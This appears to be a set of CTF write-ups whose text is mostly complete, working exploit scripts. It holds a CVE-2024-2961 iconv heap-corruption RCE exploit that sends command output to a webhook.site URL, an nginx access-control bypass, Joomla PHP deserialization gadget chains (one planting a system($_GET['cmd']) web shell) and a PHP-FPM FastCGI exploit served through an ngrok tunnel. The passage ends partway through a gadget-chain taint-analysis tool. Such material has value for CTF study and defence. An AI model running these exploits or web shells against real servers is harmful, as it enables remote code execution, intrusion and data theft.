CVE-2024-2961 iconv
| Event Name | 0xl4ugh |
| GitHub URL | - |
| Challenge Name | 0xNote |
Attachments
References
solve
Now that we can read arbitrary files, we can move to the next level: RCE. The key vulnerability here is CVE-2024-2961.
Vuln lab:
https://github.com/vulhub/vulhub/blob/master/php/CVE-2024-2961/README.md
POC:
https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py
Because I’m just a chicken when it comes to pwn, I’ll only tell what we need to read:
For full details, you can read here : https://blog.lexfo.fr/iconv-cve-2024-2961-p1.html
Full solve script
This is my solve script to bypass nginx -> read file -> set the charset to trigger RCE (Remember to change the webhook URL to your own)
import requests
from pwn import *
import re
import base64
import zlib
from bs4 import BeautifulSoup
session = requests.Session()
## Constant
HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")
## Post init function
def get_file(url, path):
path = f"php://filter/convert.base64-encode/resource={path}"
r = session.post(url + 'login.php', data={'username':'winky'})
r = session.post(url + 'index.php', data={'note':path})
r = session.post(url + '/premium.php/index.php', data={'color': 'SplFileObject'})
r = session.get(url + 'index.php')
soup = BeautifulSoup(r.text, "html.parser")
data = soup.find("div", id="noteContent").get_text(strip=True)
return base64.b64decode(data)
def compress(data):
return zlib.compress(data, 9)[2:-4]
def compressed_bucket(data):
return chunked_chunk(data, 0x8000)
def qpe(data):
return "".join(f"={x:02x}" for x in data).upper().encode()
def ptr_bucket(*ptrs, size=None):
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)
return bucket
def chunked_chunk(data, size: int = None):
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
## Pwn core
class PWN_Core():
def __init__(self, url, command) -> None:
self.url = url
self.command = command
self.info = {}
self.heap = None
self.pad = 20
class Region():
def __init__(self, start, stop, permissions, path):
self.start = int(start)
self.stop = int(stop)
self.permissions = permissions
self.path = path
@property
def size(self) -> int:
return self.stop - self.start
def download_file(self, remote_path: str, local_path: str) -> None:
data = get_file(self.url, remote_path)
Path(local_path).write_bytes(data)
def get_regions(self):
maps = get_file(self.url, "/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in [line.strip() for line in maps.strip().split('\n')]:
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = self.Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
return regions
def _get_region(self, regions: list[Region], *names: str) -> Region:
for region in regions:
if any(name in region.path for name in names):
break
return region
def find_main_heap(self, regions):
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE-1) == 0
and region.path in ("", "[anon:zend_alloc]")
]
first = heaps[0]
if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
return first
def get_symbols_and_addresses(self) -> None:
regions = self.get_regions()
LIBC_FILE = "./libc"
self.info["heap"] = self.find_main_heap(regions)
libc = self._get_region(regions, "libc-", "libc.so")
self.download_file(libc.path, LIBC_FILE)
self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start
def build_exploit_path(self):
self.get_symbols_and_addresses()
LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)
step3_size = CS
step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = compress(compress(pages))
resource = base64.b64encode(resource).decode()
resource = f"data:text/plain;base64,{resource}"
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.L1.L1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.L1.L1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.L1.L1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
return path
def solve():
# URL = 'http://challenges2.ctf.sd:34896/'
URL = 'http://127.0.0.1:5000/'
path = PWN_Core(URL, 'curl https://webhook.site/ca9a194c-4098-4d72-85c1-1e96a6a62fa0/$(/readflag)').build_exploit_path()
try:
r = get_file(URL, path)
except:
pass
print('Exploit sucessfully')
solve()
PHP-FPM
Proxy / WAF Protections Bypass | hacktricks
Nginx FPM configuration:
Copy
location = /admin.php {
deny all;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
Nginx is configured to block access to /admin.php but it's possible to bypass this by accessing /admin.php/index.php.
How to prevent
Copy
location ~* ^/admin {
deny all;
}
Joomla PHP Gadget Chain
| Event Name | QiangWang CTF 2025 |
| GitHub URL | - |
| Challenge Name | - |
Attachments
References
solver 1
<?php
// https://xz.aliyun.com/t/17019?time__1311=mqGxnD9Dcim4lrzG7DyDIxhIDCUw3v33x
namespace Joomla\Database\Pdo {
class PdoDriver
{
protected $options;
public function __construct($options)
{
$this->options = $options;
}
}
}
namespace Symfony\Component\OptionsResolver {
class OptionsResolver
{
private bool $locked = true;
private array $defined = ['id'];
private array $lazy = array(
"orderBy" => array("array_walk_recursive")
);
private array $defaults = array(
"orderBy" => "system"
);
}
}
namespace Joomla\Database\Sqlite {
class SqliteDriver
{
protected $options;
public function __construct($options)
{
$this->options = $options;
}
}
class SqliteQuery
{
protected $type = 'select';
protected $selectRowNumber;
public function __construct()
{
$this->selectRowNumber = new \Symfony\Component\OptionsResolver\OptionsResolver();
}
}
}
namespace Joomla\CMS\Button {
class ActionButton
{
protected $states = [];
public function __construct()
{
}
}
}
namespace {
$toStringObj = new \Joomla\CMS\Button\ActionButton();
$toStringObj = new \Joomla\Database\Sqlite\SqliteQuery();
$options = array(
"driver" => $toStringObj
);
$pdoDriver = new \Joomla\Database\Pdo\PdoDriver($options);
$pdoDriver = new \Joomla\Database\Sqlite\SqliteDriver($options);
$ser = serialize($pdoDriver);
echo base64_encode($ser);
}solver 2
Found an entirely different one, bypass of patched chain
<?php
namespace Joomla\Filesystem {
class Stream
{
protected $a;
protected $b;
protected $fh = "fdsafa";
public function __construct($a, $b)
{
$this->a = $a;
$this->b = $b;
}
}
}
namespace Joomla\CMS\Log\Logger {
class FormattedtextLogger
{
public $defer;
protected $options = ['text_file_no_php' => true];
protected $path;
public $deferredEntries = [];
protected $format = '{F}';
protected $fields = ['F'];
public function __construct($path, $deferredEntries)
{
$this->path = $path;
$this->deferredEntries = $deferredEntries;
}
}
}
namespace Joomla\CMS\User {
class User
{
public $guest;
public function __construct($guest)
{
$this->guest = $guest;
}
}
}
namespace {
$path = "hui.php";
$data = "<?php system(\$_GET['cmd']); ?>";
$hui = new \stdClass();
$entry = new \Joomla\CMS\Log\LogEntry($data);
$entries = [$entry, $entry];
$defer = false;
$res = [
$defer,
];
$res[] =& $res[0];
$user = new \Joomla\CMS\User\User(
$defer
);
$logger = new \Joomla\CMS\Log\Logger\FormattedtextLogger(
$path,
$entries, // Reference to the array in LogEntry
);
$user->guest =& $res[0];
$logger->defer =& $res[0];
$res[] = $logger;
$res[] = $user;
return $res;
}Exposed PHP FPM Exploit
solve
import random
import httpx
from pyngrok import ngrok
from flask import Flask
from multiprocessing import Process
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
# Referrer: https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
RHOST = "http://54.251.191.248:31530/"
# RHOST = "http://localhost:31530/"
TUNNEL = ngrok.connect(4444, "http")
def bchr(i):
return bytes([i])
def bord(c):
if isinstance(c, int):
return c
else:
return ord(c)
def force_bytes(s):
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8', 'strict')
def force_text(s):
if issubclass(type(s), str):
return s
if isinstance(s, bytes):
s = str(s, 'utf-8', 'strict')
else:
s = str(s)
return s
class FastCGIClient:
"""A Fast-CGI Client for Python"""
# private
__FCGI_VERSION = 1
__FCGI_ROLE_RESPONDER = 1
__FCGI_ROLE_AUTHORIZER = 2
__FCGI_ROLE_FILTER = 3
__FCGI_TYPE_BEGIN = 1
__FCGI_TYPE_ABORT = 2
__FCGI_TYPE_END = 3
__FCGI_TYPE_PARAMS = 4
__FCGI_TYPE_STDIN = 5
__FCGI_TYPE_STDOUT = 6
__FCGI_TYPE_STDERR = 7
__FCGI_TYPE_DATA = 8
__FCGI_TYPE_GETVALUES = 9
__FCGI_TYPE_GETVALUES_RESULT = 10
__FCGI_TYPE_UNKOWNTYPE = 11
__FCGI_HEADER_SIZE = 8
# request state
FCGI_STATE_SEND = 1
FCGI_STATE_ERROR = 2
FCGI_STATE_SUCCESS = 3
def __init__(self):
self.keepalive = 0
self.requests = dict()
def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
length = len(content)
buf = bchr(FastCGIClient.__FCGI_VERSION) \
+ bchr(fcgi_type) \
+ bchr((requestid >> 8) & 0xFF) \
+ bchr(requestid & 0xFF) \
+ bchr((length >> 8) & 0xFF) \
+ bchr(length & 0xFF) \
+ bchr(0) \
+ bchr(0) \
+ content
return buf
def __encodeNameValueParams(self, name, value):
nLen = len(name)
vLen = len(value)
record = b''
if nLen < 128:
record += bchr(nLen)
else:
record += bchr((nLen >> 24) | 0x80) \
+ bchr((nLen >> 16) & 0xFF) \
+ bchr((nLen >> 8) & 0xFF) \
+ bchr(nLen & 0xFF)
if vLen < 128:
record += bchr(vLen)
else:
record += bchr((vLen >> 24) | 0x80) \
+ bchr((vLen >> 16) & 0xFF) \
+ bchr((vLen >> 8) & 0xFF) \
+ bchr(vLen & 0xFF)
return record + name + value
def __decodeFastCGIHeader(self, stream):
header = dict()
header['version'] = bord(stream[0])
header['type'] = bord(stream[1])
header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
header['paddingLength'] = bord(stream[6])
header['reserved'] = bord(stream[7])
return header
def __decodeFastCGIRecord(self, buffer):
header = buffer.read(int(self.__FCGI_HEADER_SIZE))
if not header:
return False
else:
record = self.__decodeFastCGIHeader(header)
record['content'] = b''
if 'contentLength' in record.keys():
contentLength = int(record['contentLength'])
record['content'] += buffer.read(contentLength)
if 'paddingLength' in record.keys():
skiped = buffer.read(int(record['paddingLength']))
return record
def request(self, nameValuePairs={}, post=''):
requestId = random.randint(1, (1 << 16) - 1)
self.requests[requestId] = dict()
request = b""
beginFCGIRecordContent = bchr(0) \
+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
+ bchr(self.keepalive) \
+ bchr(0) * 5
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
beginFCGIRecordContent, requestId)
paramsRecord = b''
if nameValuePairs:
for (name, value) in nameValuePairs.items():
name = force_bytes(name)
value = force_bytes(value)
paramsRecord += self.__encodeNameValueParams(name, value)
if paramsRecord:
request += self.__encodeFastCGIRecord(
FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
request += self.__encodeFastCGIRecord(
FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
if post:
request += self.__encodeFastCGIRecord(
FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
request += self.__encodeFastCGIRecord(
FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
return request
def __repr__(self):
return "fastcgi connect host:{} port:{}".format(self.host, self.port)
def build_request(cmd):
client = FastCGIClient()
params = dict()
documentRoot = "/"
uri = "/usr/local/lib/php/System.php"
content = f"<?=`{cmd}`?>"
params = {
'GATEWAY_INTERFACE': 'FastCGI/1.0',
'REQUEST_METHOD': 'POST',
'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
'SCRIPT_NAME': uri,
'QUERY_STRING': '',
'REQUEST_URI': uri,
'DOCUMENT_ROOT': documentRoot,
'SERVER_SOFTWARE': 'php/fcgiclient',
'REMOTE_ADDR': '127.0.0.1',
'REMOTE_PORT': '9985',
'SERVER_ADDR': '127.0.0.1',
'SERVER_PORT': '80',
'SERVER_NAME': "localhost",
'SERVER_PROTOCOL': 'HTTP/1.1',
'CONTENT_TYPE': 'application/text',
'CONTENT_LENGTH': "%d" % len(content),
'PHP_VALUE': 'auto_prepend_file = php://input',
'PHP_ADMIN_VALUE': 'allow_url_include = On'
}
return client.request(params, content)
def web(cmd):
app = Flask(__name__)
@app.get("/")
def data():
return build_request(cmd)
app.run("0.0.0.0", 4444)
class API:
def __init__(self) -> None:
self.c = httpx.Client(base_url=RHOST)
def curl(s, args):
return s.c.post("/", data={"urlInput": args})
if __name__ == '__main__':
cmd = "cat /flag*"
proc = Process(target=web, args=(cmd,))
proc.start()
url = TUNNEL.public_url
print(url)
api = API()
res = api.curl(f"{url} -o /tmp/data")
res = api.curl("telnet://localhost:9000 -T /tmp/data")
print(res.text)
proc.kill()Gadget Taint Analysis in PHP and Symfony bundle part POP Chain
| Event Name | Infobahn CTF 2025 |
| GitHub URL | - |
| Challenge Name | Padoru Pwn Parade |
References
Unitended
using AST
#!/usr/bin/env python3
"""
Advanced PHP Gadget Chain Taint Analysis Tool
Uses php-ast Python module for accurate AST parsing
Supports multi-level taint tracking and object injection detection
Installation:
pip install php-ast
Usage:
python gadget_analyzer.py -d /path/to/php/project -r
"""
import os
import sys
import json
import argparse
import subprocess
import shutil
import tempfile
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Set, Optional, Any
from collections import defaultdict, deque
from enum import Enum
# Increase recursion limit as safety measure (though we use iterative traversal)
sys.setrecursionlimit(5000)
try:
from php_ast import php_ast
PHP_AST_AVAILABLE = True
except ImportError:
PHP_AST_AVAILABLE = False
print("Warning: php-ast module not found. Install with: pip install php-ast")
class TaintLevel(Enum):
"""Taint severity levels"""
SAFE = 0
LOW = 1
MEDIUM = 2
HIGH = 3
CRITICAL = 4
@dataclass
class TaintSource:
"""Represents a taint source"""
name: str
class_name: str
method_name: str
variable: str
location: str
source_type: str
confidence: float = 1.0
@dataclass
class TaintSink:
"""Represents a dangerous sink"""
name: str
class_name: str
method_name: str
filepath: str
location: str
function: str
severity: TaintLevel
line: int
parameters: List[str] = field(default_factory=list)
@dataclass
class CallSite:
"""Represents a function/method call"""
caller_class: str
caller_method: str
callee_class: Optional[str]
callee_method: str
call_type: str
line: int
variable: Optional[str] = None
@dataclass
class PropertyAccess:
"""Property access tracking"""
class_name: str
method_name: str
property_name: str
access_type: str
line: int
@dataclass
class GadgetChain:
"""Detected gadget chain"""
chain_id: int
entry_points: List[str]
chain_path: List[Dict[str, Any]]
sink: TaintSink
severity: TaintLevel
confidence: float
description: str
injectable_objects: List[Dict[str, Any]]
exploitation_notes: str
class PHPASTParser:
"""Parser that leverages php-ast module with a PHP CLI fallback"""
def __init__(self):
self.cli_parser = self._init_cli_parser()
self.parser = php_ast() if PHP_AST_AVAILABLE else None
if not self.parser and not self.cli_parser:
raise RuntimeError(
"php-ast module or PHP CLI ast extension is required. "
"Install python package with: pip install php-ast or enable the PHP ast extension."
)
def parse_file(self, filepath: str) -> Dict:
"""Parse PHP file and return AST"""
result = self._parse_with_module(filepath)
if result['success'] or not self.cli_parser:
return result
return self._parse_with_cli(filepath)
def parse_code(self, code: bytes) -> Dict:
"""Parse PHP code bytes and return AST"""
result = self._parse_code_with_module(code)
if result['success'] or not self.cli_parser:
return result
tmp_file = None
try:
with tempfile.NamedTemporaryFile('wb', suffix='.php', delete=False) as handle:
handle.write(code)
tmp_file = handle.name
cli_result = self._parse_with_cli(tmp_file)
return cli_result
finally:
if tmp_file and os.path.exists(tmp_file):
os.unlink(tmp_file)
def _parse_with_module(self, filepath: str) -> Dict[str, Any]:
if not self.parser:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': 'php-ast module unavailable'
}
try:
result = self.parser.get_file_ast(filepath)
if result.get('status') == 'successed':
return {
'filepath': filepath,
'ast': result.get('ast'),
'success': True
}
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': result.get('error') or result.get('reason') or 'Unknown error'
}
except Exception as exc:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': str(exc)
}
def _parse_code_with_module(self, code: bytes) -> Dict[str, Any]:
if not self.parser:
return {
'ast': None,
'success': False,
'error': 'php-ast module unavailable'
}
try:
result = self.parser.get_ast(code)
if result.get('status') == 'successed':
return {
'ast': result.get('ast'),
'success': True
}
return {
'ast': None,
'success': False,
'error': result.get('error') or result.get('reason') or 'Unknown error'
}
except Exception as exc:
return {
'ast': None,
'success': False,
'error': str(exc)
}
def _parse_with_cli(self, filepath: str) -> Dict[str, Any]:
if not self.cli_parser:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': 'PHP CLI parser unavailable'
}
cmd = [
self.cli_parser['binary'],
self.cli_parser['script'],
filepath,
str(self.cli_parser['version'])
]
try:
result = subprocess.run(
cmd,
capture_output=True,
text=True,
check=False
)
except Exception as exc:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': f"PHP CLI invocation failed: {exc}"
}
stdout = result.stdout.strip()
try:
parsed = json.loads(stdout) if stdout else {}
except json.JSONDecodeError:
return {
'filepath': filepath,
'ast': None,
'success': False,
'error': f"Invalid JSON from PHP CLI: {stdout[:120]}"
}
status = parsed.get('status')
success = status == 'successed'
error_msg = parsed.get('reason') or parsed.get('error') or (result.stderr.strip() if result.stderr else None)
return {
'filepath': filepath,
'ast': parsed.get('ast'),
'success': success,
'error': error_msg
}
def _init_cli_parser(self) -> Optional[Dict[str, Any]]:
php_binary = shutil.which('php')
script_path = Path(__file__).resolve().parent / 'scripts' / 'php_ast_cli.php'
if not php_binary or not script_path.exists():
return None
if not self._php_has_ast_extension(php_binary):
return None
supported_versions = self._get_supported_ast_versions(php_binary)
preferred_version = supported_versions[-1] if supported_versions else 90
return {
'binary': php_binary,
'script': str(script_path),
'version': preferred_version
}
def _php_has_ast_extension(self, php_binary: str) -> bool:
try:
result = subprocess.run(
[php_binary, '-r', 'echo extension_loaded("ast") ? "1" : "0";'],
capture_output=True,
text=True,
check=True
)
return result.stdout.strip() == '1'
except Exception:
return False
def _get_supported_ast_versions(self, php_binary: str) -> List[int]:
try:
result = subprocess.run(
[php_binary, '-r', 'echo json_encode(ast\\get_supported_versions());'],
capture_output=True,
text=True,
check=True
)
data = json.loads(result.stdout.strip() or '[]')
versions = []
for value in data or []:
try:
versions.append(int(value))
except (TypeError, ValueError):
continue
return sorted(set(versions))
except Exception:
return []
class ASTWalker:
"""Walks and analyzes PHP AST"""
def __init__(self):
self.classes: Dict[str, Dict] = {}
self.methods: Dict[str, Dict] = {}
self.calls: List[CallSite] = []
self.property_accesses: List[PropertyAccess] = []
self.current_class: Optional[str] = None
self.current_method: Optional[str] = None
self.current_file: str = ""
def walk(self, ast_data: Dict):
"""Walk through AST and extract information"""
if not ast_data.get('success'):
return
self.current_file = ast_data.get('filepath', '')
ast = ast_data.get('ast')
if ast:
self._traverse_iterative(ast)
def _traverse_iterative(self, root: Dict):
"""Iteratively traverse AST nodes using a stack to avoid recursion depth issues"""
if not isinstance(root, dict):
return
# Stack contains tuples of (node, parent_context)
stack = [(root, None)]
while stack:
node, parent_context = stack.pop()
if not isinstance(node, dict):
continue
kind = node.get('kind')
line = node.get('lineno', 0)
# Process node based on kind
try:
if kind == 'AST_CLASS':
self._process_class(node)
elif kind == 'AST_METHOD':
self._process_method(node, parent_context)
elif kind == 'AST_CALL':
self._process_call(node, line)
elif kind == 'AST_METHOD_CALL':
self._process_method_call(node, line)
elif kind == 'AST_STATIC_CALL':
self._process_static_call(node, line)
elif kind == 'AST_NEW':
self._process_new(node, line)
elif kind == 'AST_PROP':
self._process_property_access(node, line)
except Exception as e:
# Continue processing even if one node fails
pass
# Add children to stack
new_context = {'parent_kind': kind, 'parent_line': line}
children = node.get('children')
if isinstance(children, dict):
for key, child in children.items():
if isinstance(child, dict):
stack.append((child, new_context))
elif isinstance(child, list):
for item in child:
if isinstance(item, dict):
stack.append((item, new_context))
elif isinstance(children, list):
for child in children:
if isinstance(child, dict):
stack.append((child, new_context))
def _process_class(self, node: Dict):
"""Process class declaration"""
children = node.get('children', {})
name_node = children.get('name')
extends_node = children.get('extends')
implements_node = children.get('implements')
class_name = self._get_name(name_node)
parent_name = self._get_name(extends_node) if extends_node else None
implements = self._extract_name_list(implements_node) if implements_node else []
if class_name:
old_class = self.current_class
self.current_class = class_name
self.classes[class_name] = {
'name': class_name,
'parent': parent_name,
'interfaces': implements,
'methods': {},
'properties': [],
'filepath': self.current_file,
'line': node.get('lineno', 0)
}
# Process class body using iterative approach
stmts = children.get('stmts')
if stmts:
self._process_stmts_iterative(stmts)
self.current_class = old_class
def _process_stmts_iterative(self, stmts_node: Dict):
"""Process statements iteratively"""
if not isinstance(stmts_node, dict):
return
stack = [stmts_node]
while stack:
node = stack.pop()
if not isinstance(node, dict):
continue
kind = node.get('kind')
line = node.get('lineno', 0)
# Process specific node types
try:
if kind == 'AST_METHOD':
self._process_method(node, None)
elif kind == 'AST_PROP_DECL':
self._process_property_decl(node)
except Exception:
pass
# Add children to stack
children = node.get('children')
if isinstance(children, dict):
for child in children.values():
if isinstance(child, (dict, list)):
stack.append(child)
elif isinstance(children, list):
for child in children:
if isinstance(child, dict):
stack.append(child)
def _process_property_decl(self, node: Dict):
"""Process property declaration"""
if not self.current_class:
return
children = node.get('children', {})
# Handle property declarations
if isinstance(children, list):
for prop in children:
if isinstance(prop, dict):
prop_children = prop.get('children', {})
name_node = prop_children.get('name')
prop_name = self._get_name(name_node)
if prop_name:
self.classes[self.current_class]['properties'].append(prop_name)
def _process_method(self, node: Dict, parent_context: Dict = None):
"""Process method declaration"""
children = node.get('children', {})
name_node = children.get('name')
method_name = self._get_name(name_node)
if method_name and self.current_class:
old_method = self.current_method
self.current_method = method_name
method_key = f"{self.current_class}::{method_name}"
method_data = {
'class': self.current_class,
'name': method_name,
'is_magic': method_name.startswith('__') and not method_name.endswith('construct'),
'line': node.get('lineno', 0),
'filepath': self.current_file,
'params': self._extract_params(children.get('params')),
'calls': [],
'property_accesses': [],
'variables': set()
}
self.methods[method_key] = method_data
if self.current_class in self.classes:
self.classes[self.current_class]['methods'][method_name] = method_data
# Process method body iteratively
stmts = children.get('stmts')
if stmts:
self._process_method_body_iterative(stmts, method_key)
self.current_method = old_method
def _process_method_body_iterative(self, stmts_node: Dict, method_key: str):
"""Process method body iteratively to avoid deep recursion"""
if not isinstance(stmts_node, dict):
return
stack = [stmts_node]
processed = set()
while stack:
node = stack.pop()
if not isinstance(node, dict):
continue
# Avoid processing the same node multiple times
node_id = id(node)
if node_id in processed:
continue
processed.add(node_id)
kind = node.get('kind')
line = node.get('lineno', 0)
# Process specific node types
try:
if kind == 'AST_CALL':
self._process_call(node, line)
elif kind == 'AST_METHOD_CALL':
self._process_method_call(node, line)
elif kind == 'AST_STATIC_CALL':
self._process_static_call(node, line)
elif kind == 'AST_NEW':
self._process_new(node, line)
elif kind == 'AST_PROP':
self._process_property_access(node, line)
# Check for implicit __toString triggers
if kind in ('AST_BINARY_OP', 'AST_ASSIGN_OP', 'AST_ECHO', 'AST_PRINT', 'AST_CAST'):
self._process_tostring_trigger(node, line)
except Exception:
# Continue even if processing fails
pass
# Add children to stack (limit depth)
children = node.get('children')
if isinstance(children, dict):
for child in children.values():
if isinstance(child, dict):
stack.append(child)
elif isinstance(child, list):
for item in child:
if isinstance(item, dict):
stack.append(item)
elif isinstance(children, list):
for child in children:
if isinstance(child, dict):
stack.append(child)
def _process_call(self, node: Dict, line: int):
"""Process function call"""
children = node.get('children', {})
expr = children.get('expr')
func_name = self._get_name(expr)
variable_call = False
if not func_name:
func_name = self._get_var_name(expr)
variable_call = bool(func_name)
# Handle $this->prop() or $obj->prop() style dynamic calls
if not func_name and isinstance(expr, dict) and expr.get('kind') == 'AST_PROP':
prop_children = expr.get('children', {})
prop_name = self._get_name(prop_children.get('prop'))
var_expr = prop_children.get('expr')
var_name = self._get_var_name(var_expr)
if prop_name:
prefix = "$this->" if var_name == 'this' else (f"${var_name}->" if var_name else "$?->")
func_name = f"{prefix}{prop_name}"
variable_call = True
if func_name and self.current_class and self.current_method:
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=None,
callee_method=func_name,
call_type='function',
line=line
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'function',
'name': func_name,
'line': line,
'variable_call': variable_call
})
def _process_method_call(self, node: Dict, line: int):
"""Process method call: $obj->method()"""
children = node.get('children', {})
expr = children.get('expr') # The object
method_node = children.get('method')
method_name = self._get_name(method_node)
var_name = self._get_var_name(expr)
if method_name and self.current_class and self.current_method:
# Determine target class if possible
target_class = None
if var_name == 'this':
target_class = self.current_class
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=target_class,
callee_method=method_name,
call_type='method',
line=line,
variable=var_name
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'method',
'name': method_name,
'variable': var_name,
'target_class': target_class,
'line': line
})
def _process_static_call(self, node: Dict, line: int):
"""Process static call: Class::method()"""
children = node.get('children', {})
class_node = children.get('class')
method_node = children.get('method')
class_name = self._get_name(class_node)
class_name = self._normalize_class_reference(class_name)
method_name = self._get_name(method_node)
if class_name and method_name and self.current_class and self.current_method:
call_site = CallSite(
caller_class=self.current_class,
caller_method=self.current_method,
callee_class=class_name,
callee_method=method_name,
call_type='static',
line=line
)
self.calls.append(call_site)
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'static',
'name': method_name,
'class': class_name,
'line': line
})
def _process_new(self, node: Dict, line: int):
"""Process object instantiation"""
children = node.get('children', {})
class_node = children.get('class')
# Check if it's a dynamic instantiation: new $var()
class_name = self._get_name(class_node)
variable_new = False
if not class_name:
class_name = self._get_var_name(class_node)
variable_new = bool(class_name)
if variable_new and self.current_class and self.current_method:
method_key = f"{self.current_class}::{self.current_method}"
if method_key in self.methods:
self.methods[method_key]['calls'].append({
'type': 'new',
'name': class_name,
'line': line,
'variable_call': True
})
